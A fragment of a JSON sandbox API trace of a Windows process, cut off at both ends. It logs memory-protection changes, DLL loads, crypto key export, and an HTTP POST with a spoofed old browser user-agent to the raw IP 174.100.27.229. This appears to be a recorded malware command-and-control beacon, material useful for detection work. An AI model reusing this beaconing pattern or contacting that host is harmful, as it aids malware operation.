+ "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 649 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x743ff000" + }, + { + "name": "ModuleName", + "value": "CRYPTSP.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 650 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000340" + } + ], + "repeated": 0, + "id": 651 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000033c" + } + ], + "repeated": 0, + "id": 652 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x743ff000" + }, + { + "name": "ModuleName", + "value": "CRYPTSP.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 653 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "DDRAW.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 654 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D8.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 655 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D9.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 656 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "misc", + "api": "RtlDosPathNameToNtPathName_U", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "DosFileName", + "value": "C:\\Windows\\SYSTEM32\\CRYPTSP.dll" + } + ], + "repeated": 0, + "id": 657 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x0000033c" + }, + { + "name": "DesiredAccess", + "value": "0x00020000", + "pretty_value": "READ_CONTROL" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\cryptsp.dll" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 658 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000033c" + } + ], + "repeated": 0, + "id": 659 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\CRYPTSP" + }, + { + "name": "DllBase", + "value": "0x743f0000" + } + ], + "repeated": 0, + "id": 660 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\cryptsp" + }, + { + "name": "BaseAddress", + "value": "0x743f0000" + }, + { + "name": "InitRoutine", + "value": "0x743f5d30" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 661 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x76315000" + }, + { + "name": "ModuleName", + "value": "ADVAPI32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 662 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x76315000" + }, + { + "name": "ModuleName", + "value": "ADVAPI32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 663 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\system32\\rsaenh" + }, + { + "name": "DllBase", + "value": "0x73aa0000" + } + ], + "repeated": 0, + "id": 664 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\rsaenh.dll" + }, + { + "name": "BaseAddress", + "value": "0x73aa0000" + } + ], + "repeated": 0, + "id": 665 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "crypto", + "api": "CryptAcquireContextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "Container", + "value": "" + }, + { + "name": "Provider", + "value": "" + }, + { + "name": "Flags", + "value": "0xf0000040" + } + ], + "repeated": 0, + "id": 666 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1e39", + "parentcaller": "0x03ce163b", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\MSASN1" + }, + { + "name": "DllBase", + "value": "0x73e00000" + } + ], + "repeated": 0, + "id": 667 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1e39", + "parentcaller": "0x03ce163b", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00010001" + }, + { + "name": "Encoded", + "value": "0h\\x02a\\x00\\xe6}|\\xb2|R\\xb249\\x95\\x11\\xa4\\xfb\\x11\\xdd\\xe8\\xa3\\x03'\\xcf\\x8f|\\xfa\\xb9.\\xf9\\x7fh\\xa0\\x99\\x81V\\xd9\\xa5\\xa05\\xc1H\\xce\\xc0\\x18BW\\x8a\\xcc='\\x94!G:\\x8e\\xd9\\x7f\\xcf\\xf8\\xc1\\x8d\\x94[@\\x89\\xe1\\xd2D\\x1eq?\\xd2\\x1a\\xb36\\xa8\\xcd.2\\xabx\\x1b\\xe2\\xd6\\xadA\\xc7C\\xb68n\\x7fd\\xe8o" + }, + { + "name": "Length", + "value": "688" + }, + { + "name": "Final", + "value": "1" + } + ], + "repeated": 0, + "id": 973 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce1b83", + "parentcaller": "0x03ce11f8", + "category": "crypto", + "api": "CryptExportKey", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CryptKey", + "value": "0x04e240c0" + }, + { + "name": "Buffer", + "value": "\\x01\\x02\\x00\\x00\\x0ef\\x00\\x00\\x00\\xa4\\x00\\x00\\x90\\xaa$\\x97u(\\xb7\\x9d\\xbb/\\x9b\\xcc\\xe8\\xc7Y\\xfcL\\x8c1a\\xd2\\xbc\\xb6\\xd8\\x1e\\xfa\\xca\\xf5\\xb0\\x8e\\xd7\\x86\\x16\\x83\\xf4\\xdb0\\x95bC\\xe08\\xb7\\x87,\\x93\\x06#\\xfaF\\xc7\\xeb\\xcf>O\\x1a\\xae\\xee\\x11\\xf9\\x99\\xd9\\xe4Z\\x0f\\xd1\\xb9\\xc6\\xb7@W\\xc3\\x0c\\xa2@\\xb1\\xdc\\x00\\x88\\xa5:-\\x7fR&\\xa0\\x9d\\xf2\\x83\\xe4vi\\xc0\\xd6\\x0f[" + }, + { + "name": "BlobType", + "value": "1", + "pretty_value": "SIMPLEBLOB" + }, + { + "name": "Flags", + "value": "0x00000040" + }, + { + "name": "Length", + "value": "108" + } + ], + "repeated": 0, + "id": 974 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce1c0a", + "parentcaller": "0x03ce11f8", + "category": "crypto", + "api": "CryptDestroyHash", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CryptHash", + "value": "0x04e24100" + } + ], + "repeated": 0, + "id": 975 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce235f", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\kernel.appcore" + }, + { + "name": "DllBase", + "value": "0x743e0000" + } + ], + "repeated": 0, + "id": 976 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce235f", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "user32.dll" + }, + { + "name": "BaseAddress", + "value": "0x76b60000" + } + ], + "repeated": 0, + "id": 977 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce235f", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "ObtainUserAgentString", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "UserAgent", + "value": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)" + } + ], + "repeated": 0, + "id": 978 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce2243", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 979 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce2243", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\profapi" + }, + { + "name": "DllBase", + "value": "0x74590000" + } + ], + "repeated": 0, + "id": 980 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce2243", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 7, + "id": 981 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce2243", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\ondemandconnroutehelper" + }, + { + "name": "DllBase", + "value": "0x73d80000" + } + ], + "repeated": 0, + "id": 982 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce2243", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "ondemandconnroutehelper.dll" + }, + { + "name": "BaseAddress", + "value": "0x73d80000" + } + ], + "repeated": 0, + "id": 983 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce2243", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\winhttp" + }, + { + "name": "DllBase", + "value": "0x739d0000" + } + ], + "repeated": 0, + "id": 984 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce2243", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "winhttp.dll" + }, + { + "name": "BaseAddress", + "value": "0x739d0000" + } + ], + "repeated": 1, + "id": 985 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce2243", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll" + }, + { + "name": "BaseAddress", + "value": "0x73d80000" + } + ], + "repeated": 0, + "id": 986 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x7339a042", + "parentcaller": "0x73399ea9", + "category": "network", + "api": "WSAStartup", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "VersionRequested", + "value": "0x00000202" + } + ], + "repeated": 0, + "id": 987 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce2243", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 3, + "id": 988 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce2243", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetOpenW", + "status": true, + "return": "0x00cc0004", + "arguments": [ + { + "name": "Agent", + "value": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)" + }, + { + "name": "AccessType", + "value": "0x00000000" + }, + { + "name": "ProxyName", + "value": "" + }, + { + "name": "ProxyBypass", + "value": "" + }, + { + "name": "Flags", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 989 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x756b8236", + "parentcaller": "0x7553ab4f", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\system32\\mswsock" + }, + { + "name": "DllBase", + "value": "0x6db80000" + } + ], + "repeated": 0, + "id": 990 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce21eb", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "winhttp.dll" + }, + { + "name": "BaseAddress", + "value": "0x739d0000" + } + ], + "repeated": 0, + "id": 991 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce21eb", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll" + }, + { + "name": "BaseAddress", + "value": "0x73d80000" + } + ], + "repeated": 0, + "id": 992 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce21eb", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "winhttp.dll" + }, + { + "name": "BaseAddress", + "value": "0x739d0000" + } + ], + "repeated": 0, + "id": 993 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce21eb", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetConnectW", + "status": true, + "return": "0x00cc0008", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0004" + }, + { + "name": "ServerName", + "value": "174.100.27.229" + }, + { + "name": "ServerPort", + "value": "80" + }, + { + "name": "Username", + "value": "" + }, + { + "name": "Password", + "value": "" + }, + { + "name": "Service", + "value": "3" + }, + { + "name": "Flags", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 994 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce219e", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "HttpOpenRequestW", + "status": true, + "return": "0x00cc000c", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0008" + }, + { + "name": "Path", + "value": "0QpXNAhfFF/lZOxY3vCMhmmxYVL2WX/2FY1XaTSPr84bq/" + }, + { + "name": "Flags", + "value": "0x844cc300" + }, + { + "name": "Referrer", + "value": "" + }, + { + "name": "Verb", + "value": "POST" + } + ], + "repeated": 0, + "id": 995 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x756b8236", + "parentcaller": "0x7553ab4f", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\mswsock.dll" + }, + { + "name": "BaseAddress", + "value": "0x6db80000" + } + ], + "repeated": 0, + "id": 996 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x756b8236", + "parentcaller": "0x7553ab4f", + "category": "network", + "api": "socket", + "status": true, + "return": "0x0000042c", + "arguments": [ + { + "name": "af", + "value": "23", + "pretty_value": "AF_INET6" + }, + { + "name": "type", + "value": "1", + "pretty_value": "SOCK_STREAM" + }, + { + "name": "protocol", + "value": "6", + "pretty_value": "IPPROTO_TCP" + }, + { + "name": "socket", + "value": "1068" + } + ], + "repeated": 0, + "id": 997 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x7339a0b3", + "parentcaller": "0x73399ea9", + "category": "network", + "api": "setsockopt", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1068" + }, + { + "name": "level", + "value": "0x00000029" + }, + { + "name": "optname", + "value": "0x0000001b" + }, + { + "name": "optval", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 998 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x6db8a4c3", + "parentcaller": "0x7553f4f1", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x0000042c" + }, + { + "name": "IoControlCode", + "value": "0x000120b3" + }, + { + "name": "InputBuffer", + "value": "\\x17\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x02\\x00\\x00\\x00\\x1a\\x00\\x17\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xc0\\xa8{\\x0c\\x00\\x00\\x00\\x00\\x1a\\x00\\x17\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\xafq6#\\xba\\xedJM\\x07\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 999 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x6db8a714", + "parentcaller": "0x7553f4f1", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000103", + "arguments": [ + { + "name": "FileHandle", + "value": "0x0000042c" + }, + { + "name": "IoControlCode", + "value": "0x000120bf", + "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" + }, + { + "name": "InputBuffer", + "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x19\\x00\\x00\\xc8\\x01\\x00\\x00\\x00\\xd0\\xcf~\\x00L\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x02\\x00\\x00\\x00\\x00\\xd0~\\x00\\x1c\\x00\\x00\\x00\\xe4\\xcf~\\x00\\x1c\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1000 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x6db8a9c5", + "parentcaller": "0x6db8a75c", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000414" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 1001 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x7339a21f", + "parentcaller": "0x73399ea9", + "category": "network", + "api": "closesocket", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1068" + } + ], + "repeated": 0, + "id": 1002 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x770410cf", + "parentcaller": "0x7703f069", + "category": "process", + "api": "NtOpenSection", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x0000000d" + }, + { + "name": "ObjectAttributes", + "value": "IPHLPAPI.DLL" + } + ], + "repeated": 0, + "id": 1003 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x7704216c", + "parentcaller": "0x77042076", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\IPHLPAPI.DLL" + } + ], + "repeated": 0, + "id": 1004 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x7704216c", + "parentcaller": "0x77042076", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Windows\\System32\\IPHLPAPI.DLL" + } + ], + "repeated": 0, + "id": 1005 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce22b8", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 1, + "id": 1006 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x7704e68c", + "parentcaller": "0x7704e3d8", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x0000042c" + }, + { + "name": "DesiredAccess", + "value": "0x00100021", + "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\IPHLPAPI.DLL" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 1007 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce22b8", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1008 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x7704e6c9", + "parentcaller": "0x7704e3d8", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000430" + }, + { + "name": "DesiredAccess", + "value": "0x0000000d", + "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x0000042c" + } + ], + "repeated": 0, + "id": 1009 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x7704125c", + "parentcaller": "0x770413c7", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000430" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x738c0000" + }, + { + "name": "SectionOffset", + "value": "0x00000000" + }, + { + "name": "ViewSize", + "value": "0x00033000" + }, + { + "name": "Win32Protect", + "value": "0x00000080", + "pretty_value": "PAGE_EXECUTE_WRITECOPY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1010 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x7704003f", + "parentcaller": "0x770407c4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": 